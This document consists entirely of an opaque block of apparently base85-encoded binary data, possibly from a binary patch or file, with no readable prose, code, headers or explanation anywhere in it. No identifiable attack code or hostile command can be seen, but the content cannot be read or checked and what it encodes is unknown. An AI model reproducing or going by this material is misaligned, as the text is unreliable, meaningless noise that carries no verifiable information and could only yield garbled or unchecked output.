zYv`@iHHX}Ty{;Kd<+k8eLQN^QN@LI=orjG{h4k@F zvP)lS%Pe890qO*rqq{4b^4V)qy3suIpswNOhvyg%Z{3;dV6Vb{4wnUDp+ya{_^{Bo+7XqohPPC_W6@_90R2}2 z%;!ydCQau>T0U{6;u<2@GE1<7y_)y9D%*5kkoYh0YDuC|uM#`2<0^4mplZL9GWG^$ zyU4!SOJrZ{#q@+ply86RMY2EkGqgYUB5!|eC-0BFsB&K}(w!%CKPz;v5W1K9=x!0Z zml5499^DB{cS|K*TydK(bgvb<*ZJsOBlNB&de?aLCNjNiJbIw0B=p95JXvPYof<^< z^FsGVk@pMq436ByeD=pWcZ2ZRN_=kc_;fKJ1USnA<#O*T^uH+dzvPqqR-tzb(Yw{7 zmu7mm*3$1np?8#-XCk%5i#jw|#OwEOI?Way{(HHHqbVxYi#0 zMMCd!q4!;;w;apkF`@S;(R<9JH<{@nz&Q}h<6+L2IiQB0h39lz+RyMdv`p-ci|Gx| zoxkC)8+!=vr-b+SMc4l)b>j!VvV2lx`5wvgq$kUEEX$L%>hzvM|3^aq$3A+`3cY8D z-m@OPDNOI#T6JSDq4#s4_Y0Btd0!d)Oz8fU=>E*3JC*7FtX3K9Ep%TNy1(_&dr9cM zNc3Lv==CtYmn!Kk}bkNz~K|5_z|)WbeP|4%~y z&qDt%KK;HWbpJ?n-}2}>O!uu?`rTLPz9V%1E_DClqx(0Z`!>=2n@4whru(-_x+@Jj zN>6nEEp*=#y6=lVKA>l#HS!;yV%`--{~|{3dW)DtDkqKwumqy2?mG|2QKLC$lG z=^ljbI~-)Xp&-)5H>R6ox(IL%4wTbfDs&SxA<9u|JLbsjhCOx_Zrkkuqce&8*61v?&H|^8!M4>x@=uY(LPG`CZVEsbz;kn*) z+$%n>{0(8~+Gf=}L@(906NoJVga)5`^G z^f3nsyGjph@4-TE zp3s}`lW!NHw=>b(#iO?a)7zz%d;>ynccHh)M{hTww~*-V=FywY^mePHw>NJIA$p62 z-o8?g_VLxvy@l>xM0anG?v6}%?^^Y9rO-V<=pH0=5A@MpE_9a>-Q^zLotW-&kFMXK z{*@TihAOM4tAyVw;dco089+WOh0h@IS?TfVV?GFQR#x))weV5pd=3#lM+={0f~E6y zM+u)JiO*3UpE=A20ersBSDuFoy_1CA$-eSDQRtmO^iK5X&1HHgdgbYt`vs9ZST6Tr z!sk@sQ)E7?P(P;#AD8%?;_>NcJ_v9Qt<=wp!Y5SD=WyY3y6`!J`5cCP)(M}}h|fBY z&(6#T0nQPXd|nbhk#asq2%ll$vw`^>iG0=zpRJg_*}?*jzd1@3!n3d&-oso z`OF6a&YDU-uLz%}az01v`J3>$l=+;1d@dF~7ZIO}Jw6MV4+5N%kk9+d`4D~K`53JZ zc{dz9%`S!K@S*5*A6`G9c(DnuL>T$LxG#RLXWc&+z|UxkjTFgAp(zshO10r9nedyFQnVjW4L`>?k{8Tq=2f1= z=~Q$#!4CAWoN?azL(n)YU>L{X{3k_QEv?kxBD_9v5rA=N0(an@?R(cheDA|^PHMwX zQJkOS!NxG1(1~SN`he*vy;JygG}7W2F`BSlMWGtaR35 z)x>f+&yYQ5R2{ag!J8PdFb7YvPugzl_4x0h`739J?e330`e^>Fl{~wXII&Q2<~V;v z;&3wLj8}AjkQRAeYqeL7G~dQ8ozMa& z5@VK@GcuSOjH=_~Xu#@Dh=b9!$C zy0d*CA|x%&_uPX1NSo>6G~eMvkJQKc5qAXIS)hFzE*58YR1=&YeCy}8@$|+gI#J(; zD+AB>iJp?tGEXUP!T(pF^weSf9yH3||AM{l-{233K)ONKzdu*;aC+M8UBl^y*;B*0 zb>Vbma1qit6_UUpZk#W_l}P7o_!CZd_a8&g$%R88ZQuMlzKyJ3eknM^IDIzSl=Vfbtj}5`zzQI$%wpWJ#(ieGg!KCxgK|s*_Tw zO(?YJbNCSsboEB@I73qM=s1e2((Xv+D5AI<1`n>H*tdHXDC|HvMdxM_p-DM2S;&ud zZev|jCY>~_)h4k9ZB?bG4(oS+O~dyq6&?UrW7o7;D82VWtPUZlY))v-FDWSXtr;o8 zZ#((@2kRU3CJ>{0a1kz@Yz4?Y0h(gb)Bmdl+ajrMQpk z^y?`#a8-J5x}W19#kTC8UMt9$;|s}(dKQv$AOFeXft-a9IkU1s@^s;0uKjWQNt-Gw zE+GpBl9LM10c+DaSR@)$HJU?HsX18xV{-_VH-|?)^qRxhKCEgEH&uZ`+#D`MMCj8t z2bwE<&Y((@FvoGV)Qe7dO(z<;Fqbm2t|*xw@i3pJYYfw2x+ov#t3H&tnYw!~&16Y~ z&sc~I!16SBz-}|1kjoUGZPc5pi>ml?qjw~yd_dCUHC{q}V(m7Kr(!;*N>3fu??I#d z{UU7BSNYm>v~--eauk`f5D)c-=R8JzyEJPP(!K``BB}WIXC6VgMPCUow*|<#Nl*W; z7Azm&nFanP`NALfqm~>_A3M7}EG-yb`ssGm3+ZKTVV^KGU%aHC@3d0$9q%8Id>O|X z1DSJ`X1W}nrgq_rpY*lN)=)wY7PreGcRY_NN46WPk8C%nbTr~SD;?pp(je|=fbQ`w zYs;-*irRHsa}*{Ubm=R$=|oUYUP}w!zSM%dK1B;|(Jk1oqw<#gT&X2LS>2NFuL8-y z_PGx$2R0vzk89EI){?)gkXGq9kLu|hQP$B0DH`yZpnbuXaVpf=lg1t&BdYX__{PUb z#rTNt0c=ZF{qd38P-xCW{-F`gFPw8@8n&{Ex(+`Rj zZ&I0WE>-4h{@)BoOG?(+Zq?S=j4F@}N2$^OX*i?~|&b`^Hc9$cg6 z!CP+VHlj=oBwjPHdF~iUyeeb!oQiQ~M>Ub>C_D2UrIY6`bNQ`{-zZV({3`zQN^f3e z>8z?h6LnKSs-28-kk%4%FNPJbRguZxopV-Akd6~Lm&_$$`BaEswJ6q z`V?+NO$42{&;c9o{_rE<73@P_CIJ5kz&Y1JIN2If9a8Hzlvlq)dQYrw1_Oy;Yq+8f zl=I3@5c-;FIMo`;h9s<*ZRNEqLX7pDwcEUm?_D z@mB}#EkD1ksRxC+9q${#LD-hz5vtAZ9@A*wk!3jQ8#QVVL~%WUW^FFmQKE*z&TPeN zDA#{+VY9xmX`WK!xnemxdA?K=_jVa;{rv{FwOAJQ00k%O znCT-27uiP1+gJHB(`WXg2a<;dlSbJ5I5V9qw3+FVLX(+36h_MQ_JyDcy}v?l-o4FZ zbydff^|CxNw&Tc1ez+T;S8zRly0q!2o!)--eC&d!+PNcaZKJ(~Mjpg(li!Ef7s0I0 zu+!cBFB$mUz8`PL>wBMGrq6D-)4Be8_@y5&Bj|gDUJfk`+K`c*`+kCbk$(tE$`Ca7 zL~P#aINhs|tQdy+mV8uY>!cfKM5`RJw4qZCZ_;oxIU1nh)13P*STR*G$yBZq;Tdv! zu+8*X$!0=#nN0X5&$#W%(7LNSL)540X z^6A^{qcIiZP{Mgi-;XdCs?;ep@;Vvs2b|WME>CX9WFap^3whaHmF>*OKA<_NG0p-p zj=q}sM8=Urr+;?m=f|$V;ir4-csSovz4DfAsj(U-ww!+qom&9mLM@+2xbn(5o*h>z zM5|`X>8B!DVLGQ_pAj?DhZk%!J%w%+N8KJ-t6%lzX8Cz#)uLT@t-n&m&$s9vTZS+h z18v_pM*Z)usJq*>{dbtQWlbrRN`q2*H|WXc_D;~FBggR%k=V!Ctz-3ZJZ3zg$cI%` zZyd8RNR?O#P_V?PHZk(n~zemX}k)IH>|w_mGr9t ze!e5Vn=T12LI3HWsbk!moT?y0|G%&){*qpfoju-8uj=2QUJmU)jDZEW??DQkHoM6N z3-EXd6%Oe862aE>D|!yov+uKkihi?E_nRLhWZDb{Ps}jUJdZ!&hV4<{0{c~9_3Hd^HW!^#&Q1-z2n?AtunOh@GR62`Sdy~d3uv@XO7}C+0I^6 zk?{L>vuwILO7DA-oCP^a(3d^SIi0m%8VFN#;db0g&*(kD51x5Q?J*Rad!aCYY~<>~ z|>AM0P#^2@Gr}qc-)*N5Kv|5qe!h}`42sGHq7udyN z_TB890l}VZBw=-N@Z~|g2y;uDlvcvhH(~CLO*mn7qjQ~5EjC@Dnsf)=O;Btj$n0bG!h0_vsPKQ}vYa|g#^+ppyH+xVb($Nb!>}&rdIrQKPRxN!Z z##)JgQmr(|Rie>E0~16O^VUzKjILPUcNAtaWu3GgTS$8?7^KT~qkZ2RD|?NJ#`5en zdf98#*&D&^5uKNdtxc-$uvKYqi#< zXPhv&8Ly9vLXrMBfO$HiI!}p2qC8ItFHZ@{6BBuPLTih^@g+DrEnclTG2m^xt5axg z&KX#hTNACR-ljyGCm^o7C0aXr2dYGzN*Bj=L%lI(f+F@!eiB9S;?`maBJpiB&BYG@ zq*wcEK`)X_~1)qFPQQW9OPGxw0MA*M_tBYAhSZ|E^vy!rewEn7O3tEcqYV z8<^rNYZPD0oEl__O=n5TraeacBJ-^^mP()?bN;;916Nu6<>rDm32i;eq&ookQ(?27 z5hTBAZ^kIpv;CA@E-C9Scxt&~p0gCe8>O?Eg5OA zM?8p!AYL)#5X3T*SH+J&4Xreti5A{B5${pMuR;`elN_4x;vXpSk5Y6q55-F7OlOkC zcaBg*+8Ml@V_MEJrM^h7$(CIuj8{f?8+bjQkQ=d>oV*@d{<^(>Ep7xgHw8wMGrWNo zSE$;Y@qk|M7ka4(eXNo*$hh6%bbX#)&Usw!J6E(t&Usu$=RCG}=R9_mbM*dmMIM)f zh0B1+Hyn6~0|c?g^UdP-7-`?Ob2HuJ0!*!y(C7S3;n!l*@fj)3tQ!6k_Pil`z;w2w zOxq#TIYH_3qs!P?P5HQ5@^P)4BfBQZXI!uI^Yb*AsS1QyQ(6JeKp(2ky4@0)_g7ejs@$qqXW8evs!1XqzU0AD4R<1;+fTrBJV>Y?}H-m z!#+8`C31d~tqBM2KY&sYD`el^$9Fg@Ik@abj^;w^+KNMMi zK(hYOlXWr6`or3~xmN4u5@fjo#BQ_RYGdUZ>S}o~OR^1E{`h{JAVkd%8}0y}!<%C;9q?ma@s^&KE(#A%wlO?VR?hJGldmqnDRub`s>^SBb$NfT%Wu}M%bRr;9{2Z?7YX0Dh3`AU_isLa ze-(azA%1`L_$_6Af33~$GR^M^T^B#+)y30eS#|Cajkp0B+ADdqJKDzATf<+Y5<>z`hEmFfJdIy%2v z>*mK==U?!2e$&V4{AitcTZLVEiR9_OlBZG0(}%vid?0ywpYrm7mzU+7mk+$W9P6{8 zR}x2<>u?{blh^5_(~Mhx$K0%viwC^ zSzapnHf_$gvN_+D&1D(1OZgAjoPWc{{No$v{{YTE0(|}(llF~mCSS#N)2;M&Fn6cf zcht_~k5%N%AVr^kw49tZdb1^;`&qaPu&#Y|5w zG@I#Zg;?=@f2=piz3^95E5v;r;~r&lpwI|-45+q|KM65(7tqxz6hJ+BXHuN6n|y1_ z_2Yd~lJh1#nfatBnM!vv*$$GCx$7%krk7vof^{b|OFXK#@MWvcLu3@afil0rrGgIO zw>&qIb_oBGsDIw1U4KM^E?stSMLH{S2Uy&jWTl7Q8w>(>bojxm82q#vH_itxeiibF z9|95gl<5nn9Zn+k=!jZ=TRg3Xw<~0|XLf|sXt!#a>h$+hvELT%g7F+y7Xm;5w&RrF2<>` zj^K04nshugz&nY;xk<@}>^M6@%X*BDTvf1=@oYGf8fb`wdS46YyOhl>CLJHTJs`zG z-+ZNZ6Vh(ebdI&6U%UBrN55jJP4$Y+CG++t07$s9P9dZ7_Hlt&pMYIwZ z%P5vyn#kytxIo5WzKoB-OOz8U`59P%OJG!`sAj&goCsKAR7apSIIX6atd^^iTjK_5 zjr#{_iYCIFPRgVyw|-yiw3+1*+R7s&opuCVqPhg&pB5!)TGYh?zN%+IA?5y(#tca! zb0L4ilt1BEwD&8ged!pqH&@a2B|J=}qdI5vX^E8Kl^UshKTMZ{V%LN&>5ogd!pjRy ziA4%(1DnMEuF}n1!pfm99pE=|VSsb+ihuru>;&u{s@?C@urgyb`X-^E9Q?R|^A&7} zrEbv|J%eo?zxBC=+B{Yzynh8*(D6HtdZR#0JdAt<9!3UD-$9zDPd?mCANH+ErR|EP zy5B7oSUSOqsS@A$6{yHenp@Vm+hYWJcXPGk(wUWFg&r$4*YN*Ob9audIqoly)%-tB zcdV*h1T=RSc9*C^{LV8x?uN(EJ@BXFljzeVJM*(_b5ow10>y|S+f|&e!Jler8DNi@ z6{5SSif$Xzyf^UaX>OINL#|Zjx()HXfcvi>E2pV6mOnK1SYCWg<1)+3eXANAPAeYvay&Fa8~uNf`=qSTf_9N3?L9y&Pp}UppJ-)hAodI8qW-Bhxt!M2}jzMw?2XQm6Ab+A%X7J>ihJ z8HUG7JatN@Yie+647f)IesW{DIbi00W3zoR-OKN+B*;4>p#}A2wmh#LUS4-8&#Pp$ zngZRGH)c+`{qJGWF$rlSFv`@)9cQjGZ(i13(rp0Obgv{E!U~jqFBIyWimMF>4Tqcq zYke=YGF`G>I=J6=boLQH*cj?4QNd^h;--sJG zicjIBBZvD&hQ2{JvpG|t*xheJINnDWVd1Cgq74zZ5CK6Z^V3J8#d06SsdzY)u-u0r z6me%@%!BypJ`AANV0L;Uh~KV@ww9%}@xvWa=Mf~(5Q5i7u?t5k5WNq589#VAo(Seb z@H!q|Ukq{XCq&#nWYQLKXW=s*;s7NLQ_8t`Ztdl0IA@0?X@+vx8Y;`;gI*R}!-=rF zBM`~&0D&9?=G=g~DjoH#;P-+~TqXGyDColJ#Yf_0-_ZZjVqI zyhIeRbCF~U0y|)!ky7kXkoiU&?$qgRj`Zrv=Ks^TkPST!gmBML zz`-fjTgJ{kfjG@`jGK%nj}AmRd~V?BeHDdq9K}yoUybz_W&-%pVC<5zX7Oar$)-;T z(`IvG;;{G@rQ{yCPy0jFpOVi^88gMeUs!GU;BqnNSQ;&WByN$pu=nZ zm2&B+|ATlV*nZW}cd-d#W5oG)0H2reHl7)-~W73LUEU~Qglx(h(Wq3;FgcF-rWnkOP;=M?|#>1p#? z{Oli=gXv5&4ZWU>_U3hzZ?9j9Ld{qdGfE#J*|Fk>A0ZiM@V2IDJTEk|JEWUQf=s%b zpX2$_!H*O_x+Km5exlvDmM*bbECMJ}#T*n+gM!tdcr_?o4T@HStZGnWHK@4+`htMG zkBXP{)JdnRDOxJi33cd6)4=_m3GQ3-I}hy_!2!_bI^iyYH!6A`4QCZzbI_ua%IN_* zLo1=hINQ))ZPnuKZO+><$T*%&EHyk~XdxatVk zPdu(|EWGc<*L}8H*#z|Z)O!Y1BIqmv3;?L-e&eNm@qQ00hXVt3Ow2_yV^M`JGl;#+G?I$QyL$n#zI)M;u(72)=@F%*EuJdQ$C$bT9qn~0VE4_# zQFECDMC_Hgb$1sMc<4veRYVdteX%on*?9Ewz6!Ba(bc(1*rii3&`nMARmrQ%t0a{0 zkAdLamQgUO8e5FfYw1YT(l*i(Vw_c2QYYFQ+sdOIh0%UO(GcSt0?{_Mm&Z98 z@kk1wg8sESXtz34jAyLzHpgizny|i;+pe4$n4vol44H{ikYKGYBRmS*&ALd z>=ejJ$cU~=IJbYi4&VlzXERk1$v4NOS_P^YUoJSg$4k%(eN0xxe|XY!tZG$s)TG!^ zTOUAipRN+cj+zuRG&|v^`#es5vQF6j1y1guS>Y5c-=T{4cyuDZ)I8J3Z}U$x@Z4B4 z*8ATYJG2I(x~}78f}i(vH-2p0L3X+&JLn(It(#yogsyvY?toq^ITLc$lrH70g!bob z3g&Fb>g0Jyee}ns?y3@^t6YfbK<4j0GF>&vO!kE6suE&p_s6B4;1gmF4%#*^VGP-{ zgwarn@yh^K1pk}!EBG_${F?gC7E4Z!7zTdcFq#|<vG`U=&eHJ9No{wj=QmXN9UtQh zC<8m=n)zwDuLk&}pvkVcetx>Ip(6=<`e?Szrk*}#h1l6obk+Wn9_+;yIOt@`6vzv>i5z6uhW`WcZ>IQB z^f7I;(cin(zB(34M|x+f;$L(w%61T-VYniow-dZbhplNlfeMX8$(s-h;FlTs~Z6xpa2R>@0+pP^BP4@Ny9me~BCVTsUicJCMb*y6{ z(@E22Ll-xmFtZxS2R-EJO-hiKAWiqD^^*Rq9`fh)kk8j;`s;d0pYV|0S?2_;mwd|< zH=XIzIF)V((B$o1rn^#}v=OX|dhx`m#wl32rqtT2g7p>0(OZFEwb;%!6rk@S;_bWpqO>nZ+Sm57?=CC*?lQjiHci@F54E>xUVA&7 z+uJm+z17NIz|zcnRHw-@){6I=x=MPqo_-(pkQv%(yoRS$en-5ON(J4M5Drn=Eaybi z;Pc@tpmlr+>u`nYP4cN?$AzA5{H#tV{9q=7Usa_WFOTFA(6Asp5q|yf+YNsE!0!O~ z;cdM~%LQ+JV8I&lY2%>F$Gw6s9Z$1pOCXDBQ8Np=$Bu>ILxS{?dt1Yfu83^0xgN22 z$5FNwdT7sz4!XQ!-ln@Sg6@S?iKozhcI!5L##AWi(m4%l-3J24XIzDY?goaxFK~P| zs7TP|Ll9QU&eTzBtaXiVt-#3`)*zAAM0Y@uZw-FF7|`E*gw?8{--YXcXhFUuZw-9F7}tcUf7yGxm*pKRBU$2Y(S3UdTS9OyruXs0BVfny=DW(_B&0mzcd6hi@#(2W#n@`I6 zINrs-k3ru7uld8f4siT9$p_00fteGeQ{m|A@j~MyWUYILzOR&TF8&FIB0h5f#(H$U zvV(M!0F0W>F{OEzzThIGfGnN)P#rojP69N*@i#BfZYo-a@fDo^cML9a#8PS%3u&Rq zjNgK~lIOI>6Y#?u%rnd3)B+YiO~pq~pQ{(mU` z<)!!t82SsxkB+tPw_XF;v-<_uN*%%+P(_o$Aa$J68{5=zo8T#0Yjs# zpZI7y`sWhypgSV*yD9$ZrT7RKiZT6$(RTcBS)w86o+0rkQ~Wba@ewf8$nhIT+jqwJ zjY0P;i9dznuP?<%z)+CmH;uOAS7j1SL3dcK*qmS@Bnw|hyPRR0X>W$Ei+yVX1#!vvi z){WaPDVW?Eqvyn}@oh7_gGfzaj1NBn;D%(YmF8(XhAx8Z@AReU!?WWXQht;V`a`ynSC8;XsNz9A#wlt8lJYw}%luNx zfO0qPLZ0Lw8D5MhgTgFu-rjgQZ9k^B7Gty>B6r%(eeAR4yM;Q-)0Wb(8!E+t357=S zQ0YsA^D!JjkYEUR-y(sbzmaB$n{er32UljTnVe;rshM&nkVaO}bWBv=SSL=S#AzzU z8CMynN#Zo)^FoT#Q5gqu%Do#~7s-_<(W{D^5PB`TN>E^-8g8X}VE53>nlK2-+^L*L zaCIxmPUs|MOpPPCRLZ##4X2cI6Y^d!%HEHUaM8<#eQ=lK;?%%_nfLwWI7P}ariR|Z zxn`I=-24|~xqnBd=Fr`s>XC@{c?Idbg+c3j5idn<4}Q8>eUmf$lqTc>Q-ki$kxRtK z#gF_44i#~hZ?t_Xl1C{svwR|F<|*e3*f4D6{0Ot#qmM0uvQkdOB9I(e1W<tA65cP-G+MANT~-^WFhxf)KbCeNuwQ)BJZO7O5xZX%lZYNu9$?FaJt(4@A^ zt0hsZbMitRpB8yHGWuW(O+3VTEZ%4FGuQBDHL>*&S7CArl)19V#ZaNW-_&+wHL;P< zpdvKa*5fg`KgMukVZCZ|p5h9GbDSIX7+^X-1ZXsvn`zQsuW`MONlTG9F0^HXBuQ}{ z^x5N`f8uN?0!f~MB-wPMm5-QmRbz|d5T_+hc52Y1(-LNB8(Q8>W&^3gQOi0!7dCmv z?fFoaJQ3pGgYjF8mVh%rbX7>N*x6i?(oPpkpJnpsa?c8P!4C$5)$Y_9owg{MQW@HFY6)#imXsN+8+A#vd*lp2VI>{<8n z8W-;O|0?iGMtxnZNw+Wea;7>4W1)Cvfv~fVP#-Q4?Qq9HG#d`52IJx6^xxQd zs5bv8RU1$DhgGbl(Sernm8)spFrYpfS4aZ&lkH@Gd#a5DqUslT1 zQM`wD_E@XG)y9y21(+y|!;g1jfIi-dfr-8NjZB*tCUt2n@|Du_1m`r3|xud9bELE;5A{Qi~@fwygG~UKSo-;yUQHj3N8@JZWWh-T9 zymN(oXN1125{(C=d4yVDb;McDHuG?`UM`L+L*xB%JTR@7i-5||cpngXA_@J4N;F=1 zLe4irpI3>-+ttW>PUv$g(Rjxkx$Oykb(Ls{ep90_u0-SAUp$ttmuu3>&=-0`<9fN7 ztPG78l<`=)UM{mLL*t!RJVvgU`+CaIcx?~4Q8P=b&nIV&9qSZp=9{J1ayJ0pxI#1A zvP+|!pfs5#ZTjKS)y!O#axFZ=>a^el^e}FHT{HzT564#c5RD*o-nWL24!f;c@WV5y zhl^hkcUIw^w};{PfAIT*SbRw^=(dC3?(kcN-{yhe+3>@!gyV??{2s##@cVCoKir&w z-%juwfZuBPU5IB3;fLSU`Y!xlh2PtX{dAMzw-@{lg5Oc_bJ0h4YRN~(b!KcA9j&=& z51p7*V>;+)*+~26xIT^To+F>U_Rev|uj8B}FTD26aXYBvnj=57_RMi_QO7YyYZlrs z$E~D}TaMPZv{#P1nmSH7^3!Xd9QQnRTynGmqCIll5!G?Xksn|CH=dT1S^Lrp)%3mnkbG}m=jFNH$o}6Gp7)V$ zw8p~C)3&=Bo~c5Z16h@xcAyV-48o$@Pzv(K#Vi#fL&m)f{w&L!u8Nl$-u^u50blTJ z7;TR|DeEf!brjs0(FVVX(x2gZ@%_g59Rxq9%XD{+hGkF033Hs+c{+4JX5IA`QFsAKtY$t-EBN60*Vl#5O5rmo zd{zmcLww{1g#5uoe!wGtER!Fowa4KBp?`$XKT7By>7#qN&^?Uk9`4aSj_Drm(FLoy zja_HX)rO4Z*BE3^;-$e}=sFB7#FaRNDQkpM%~kHLCS4)fiIr$c8>EKfw3`E_vWCVX zY@W*78yD01RfIbX*f@tSxAahC5IRQYMP!lN*qB@dJ03vLnWzMZC zz3*jcOpNT0o;>nTn#CKZm5ysK4d}g;3-sJOA1mH9P2YxQ;T3HUP16lIh_6qTUd=6Q ztihRn5bf*zjLcc-4s-{Nx8da|+RPaMX)>LxMPHj%!^;plP7Uu*f-8mJ`;)h@lefs1 z2k|oyvVsHA^qg2WZ-oZznU-x0#!M^ZPuif9Mkp!7YgU#$>pA`g1NPx~UsrJPxI?3M za^{Y~;9`65K$amNSK}^2BV&Xlie=jv9)b)k9taIw@p+k){{g0Z%SC6lch3oDk8bwD zRCE=MX~ExSb;aj_PipW$d)#ygBxk%7T%2!!mxvI;Pt1^fbINEXXHFOG@Vh^sQJqhl zRg`3j=BZ&UO{_AdJ4Lvk`lht+6QzBhB<=fT=|9%$e#-SV_!FeTub~Eig4f_rmP&rAb{|OoX4c6c=g7;Z=}gCzymY^Za!iQiSokLhe=GMdcz3B)x4CSOK?B(U5j z6qBi$ZnNT>*aX)guTg$QR!|FaQROBSojyVzAD&&92l;vs^95~tJ4d%|JWXM`EvWHq zqwTgTx*Wo7Q+SC4olbbme>%ZChcnI?->c8z@c2RN48>kY`ju^~wdJGS#|=Inp|-8i zK<9S6bBbWcSHY6{I~nN5dq~h=Q|Nr}G-kmu!bLPx`=FFKhT)PFiQ(`8L zr|;)*NxbTEk`4ncbU@TXhH9NI)jBjEh4YPRS4e&~;|hstr($Bi4bo1?3wkP_r@RU& zY4dbB>oV4i;aN;;)ySvR1*~7hFJL((!Iw-F1C7sM`^R4pxun9^t?-#%xPXatTKDwe zY*ZoraU5w^DXH(eBom9Px<6TLi^*oZlmQUoIELbKIdP zneRk>e35X}7jfUDfN(Jq_3?1(#}FNuC$LJ+&42*)YA}Fbj9G<+NYn9{Op_7TA~A-V7~^eWrVD#-&xiFgENt z9v7mdzDz}m*GY;n^lc@RS(#v6D4%FO6q~2A>*QmVVh#O?hVdo1!CsaLCmKwM&J%t^8hQIX$EVAQWd%ul;%s1s}iJZ-ww2)AQiQs zXy*7r_#$M}71c|+w*S(|x{yQ;7bD68QG^?#2$m41S|EnBZ??9GS9L!kY@S|#bw<3$ zq-)R3ASGxf<+&FoWod$!cyk-A2Xn3P01%PNm##F%4sFN|a!c7mpX!~@uOU4;b1er-TS*=GJENFAOB zi_mTsPBMan3?(%tFi5JbGJ=CKeYg^9$?gTyxd4|F2`fN2BsF0!lvYh%&1xZ&6nj_c z@ZFo5xtG$AAqUTg7_vWfScd#H%=K5au|dB>dFC2F49kUAbIOUAMY-M@9?rFt@Aqm8 zW(Kq-b9mF9RTV$P=$-FVv<{J?7o@{sJMX|%kYdTrW0OzVr`OEWDqALUb=QthGUnzMMI z3pY?JRaBU~z+StpqKAL&p2}>=cxtLWU(vG^+Y;#2V;6gSkW;k^sXgs>Zeu>R$Lp7G zLU=~}%jXl`TrP`~xPxf^hT4aWR3jOK3}NCz4;CJnX-HX`@3xJN#5zk)*b2$Pk(PWn zSTfox()}yGZOM^v0neePkSf@Yh-nH4P7{!ASSGgxg11A6UI`2qrl+ml3!59Y-FEA( zXj8yBJ~}HbY+JkgrbqSaqiFFy9hJ3D78{~{V(s2PnnO8$+U_)iex5@9du97BMGDVW4Lo@c_~$uRa4R}W z#?CobP?t=o5CuZ=cdTd~RC;`=5AH=on*zI~nA*nc!{Etx&uuQ0VU&z&N@0hrkq7C^ zP*r$U!3b`&6Dmi&*SLVbk6;W`mPH+1?UIestopg&GG4?BTBXx9!t)Fk9qMdq zCsp+n!WvMfJh@(V`fDGc5H);RkO1lH`I?7@c3Tp8H;!FX&b+b1+GEqn|K?j(8+YV^ zH@Y8%oGrh}sv2{sO0FqZr*PcTVHJi6U=~I@TCBoY2UXT++A5|7+vsO_DIyMzbuaHV zGv&PD!PA<|5826LaycdQ3Zog%9r|T=$)vr@7Q?p?0}E1q$nkB7R7}}NZ}#mmbRGNX zexa0~Sb`)JH{JBAGkw2wZ2Q-SM{+Ai@;F5lKu{<8vR z|Fa^Uv9BU+wU4DTZIwbD`#&wzDGk8QPBmvAyPp!+sDd4P{wW3Nn_l8g7T;O%?Wr!T zpf6awG!-!8wR%}ApQZZ9I`rq}vtB-%#NjB;t#Ry$Bk7U*p)BcMlg;><;=q7UzlRM3 z^n3om!jW4kf7b+Z+CF;tCcOdiwT@ib5(Oqzl(efNEwgD4p0yZnKHEy@$^-56TOB^2 zkZncG@(TVP&{+>sO=XI!rDlD5GeBdb**4$y+m=~=Th zr6!UF0U1^V4J?dGw{~#v-n}T=+C#;0*xI$^ptkXf^Vi`DH96)DZ}rpJ_Rem$FO9;iwK!e%WQd@4y;1mw4-F)+x99ZXDqH)FHE8xw|tZYAw`=ekOn(f}f<2 zq!e`hswpaz?I%ak^L#5ghAv1M3}S}HqsysRqxY1n+FQuy^N29^c>Mw}?ibRJ?{W|x zNtWo;i4U|<%bstKfmhuZeb5tk9#g*ZOOA)&oD(7)(sPChTO zwqkv_fV%v@i}VsiI@nKTvz=L~giL2nsVC&h83IDThZPsHesN{Cv(slqD8F;cAg7oF z<8j5g6jSxfS|AG46prMed>k*u^fHX#!r1?c09YW8XeiKp@be*GWffc;tLAlYOQ>ot z&Ku1S7Hp^LPF_M0$~J#EUZKPYdYfoHUlAJ>r+lOe$4uGLdydg}VDFiap3tkSv(Yk5 zXo~a3reks{5v^f^hE)a|>^Jd}b4ujA&{KR&))zBX-e@@2q}}4`!Hi3T)1{xWOnHf0 zJRE?70N9@ZdAImt0L}s6Gy>R^I*(c1qlwHJ>)Bi^o^|f%CYBCbLmw_E{lx8-OqKPQ zV-L6cuX^$C4r>h9thuN;3J`4ydK92v$C#@C&+8cT6yQu9W4;3XO~+WE0B7kK#iW8f zqoWj43i6^TPFg{pj^bn#WJMIGRYCq3#c5NJu_#Wvg8V&-)1e^eL~(ot`9~C|Q$fy% z;$#&h+D#R63UY1~r%OSi4Oua-AX}n11qF%rbVc0?tD`u&8G55Qx*gU=adbmOtbS3q z#JVVsZi;AkS=4Q@CW=#3kcd|=_A1EfQJno6y+FlTs32!YaTX~^#4Z;XE66LNIDHBd zas9=91&MS_ic1tE;_Qoof@E8CoTUue0qIIHd-V})_rAf>=IbvehVa(DLIYG#pza2! zxKzRB#Cp2|^~8pV0?m!}cm>j zPy<`z{Z0eh;vG!`+v7b#13Ti~O#}Uz)mrR~x0V2RK=PEEa$ZWFdL5FyZD^pKE!sAe znfSh9*XFY*zi;=k`aau^TPRlTF6;zgpmN81;Jq*M-U{!-k@vmu{xI_12Jast@9pqf z1KRsOc;`jl_rtp|@_qo`Qsn(0ysIMbhu}Rl@_rcJQzP#k@NSO0A3;H%G0cgZSwd)! zPQ05P!6dd&3ynz-W{nm%1+N3ZHzwc5fZz&C9~YvIZr5j!rg8bT6d`yG1+RWPK?=q= z00+FDLnl#3qs6LV+eQG?(x`Fye<9Ip0X&ORz&CiRe2baEV=3Ny;|bRi;5JEkU6in& z62dn)U%ryDAPKe`FfE7^*?j3FDAVph66nFc8e7A>T5pDlIe0P4R*p6>gDF979cehg8gsQN^q> z#^EWxXt3hY2BYB6{$iogEl4KOhY3-+!-Y_R@j4 z-J{t3rAR=lEnh$bz1(L6w8M5f66Jm)c(b_XwI|vWc=$Dy4_*ZxJYDR?K4U3ozrE}Ce|mfH zPN7VqTW>-kq!aBeMG5w`}fLsJmH z)Y+np>HcYb@Or>p*3J7;Lh0s7-Q^F2MQBx@l(`c;MvmgL;UN{Fm>jy$sQm%6-FG2^ z-eT0Ahv$3n9B-IyRp^Yg(@J;c{HPsN-mp*TN%MS6h~+A zlZ4f|?TM-UR(#SC{UrLP=rD4xOxA!QfFUBPrTigSOeWSrnlMT%r;Y{Ixp5@qfv_;-_&9oVlB2}dW+e?8_;0$X3Jq(!CQ^l3yZQ&sy4F= zn~Y+4zN+2@W5IXOXinE~)+knIf(Pc>-J1+O(T!Tc&6wln(mHrbzGO|l5i#VZuLC+9DRQTK0VcD7dG61UduJecR@Xi*Y&bX0Ne$IJ@czk+qHExX7YwJKX^M) z>C7L+QphR~?=Ya@LP1F$I3b6Ndz9L|;OzLk5+8Ox8 zEOfX#4eEBc^JN6LC%BazJ)_0yO@=vllsFfG%ooUl(WHjZL|NQKpkjKo-3YD)bFM>L 